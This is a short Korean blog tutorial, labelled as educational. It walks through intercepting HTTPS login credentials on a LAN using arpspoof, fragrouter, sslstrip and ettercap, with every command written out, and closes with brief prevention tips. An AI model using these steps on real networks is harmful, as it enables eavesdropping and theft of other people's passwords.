SSL Strip을 이용하여 https 사이트에서 id / password 가로채기

** 아래 포스팅은 교육적인 목적으로 작성되었습니다. 함부로 이용하는 경우 법적인 문제가 발생할 수 있습니다.

SSL Strip을 이용하여 https 사이트에서 id / password 가로채기 

구글 사이트에 접속하는 내 id / password를 한번 공개해 보겠습니다. ^^

아래 포스팅은 Windows 7 / ie 8 환경에서 진행했고, ie 11에서는 잘 안되는 것 같습니다. 이런 것을 생각하면 보안 패치라도 열심히 하면, 

좀 예방이 잘 될 것 같습니다. 

1. arpspoofing 진행 

 

  kali linux에서 터미널 창을 열고, 다음과 같이 입력합니다. 

  #arpspoof -t [타겟 주소] [게이트웨이] 

#arpspoof -t 192.168.108.128 192.168.108.2

2. 주소 전환 진행

 터미널 창을 하나 더 열고 아래와 같이 입력합니다. 

#fragrouter -B1

3. ssl strip 적용 진행 

 터미널 창을 하나 더 열고 아래와 같이 입력합니다. 

#cd /usr/share/sslstrip

#python ./sslstrip.py -a -f -k

4. ettercap을 이용하여 id / password 해킹 대기 

 터미널 창을 하나 더 열고 아래와 같이 입력합니다. 

#ettercap -T -q

일단 타겟 PC에서 접속하게 되면, 특징이 하나 생깁니다. 

주소 옆에 열쇠 마크 하나 생기죠? 특이한 특징이 생기고, 사이트 접속이 잘 안됩니다. 몇번 시도해야 하는 경우도 있습니다. 

주소 접속 잘 안되면 좀 의심해 볼 필요가 있겠네요.  

ettercap 화면에서 id / password를 볼 수 있네요. 

까페 등에서 접속할때 SSL 접속하려고 하면 보안 로그인이라고 안심했는데, 조심해야겠네요.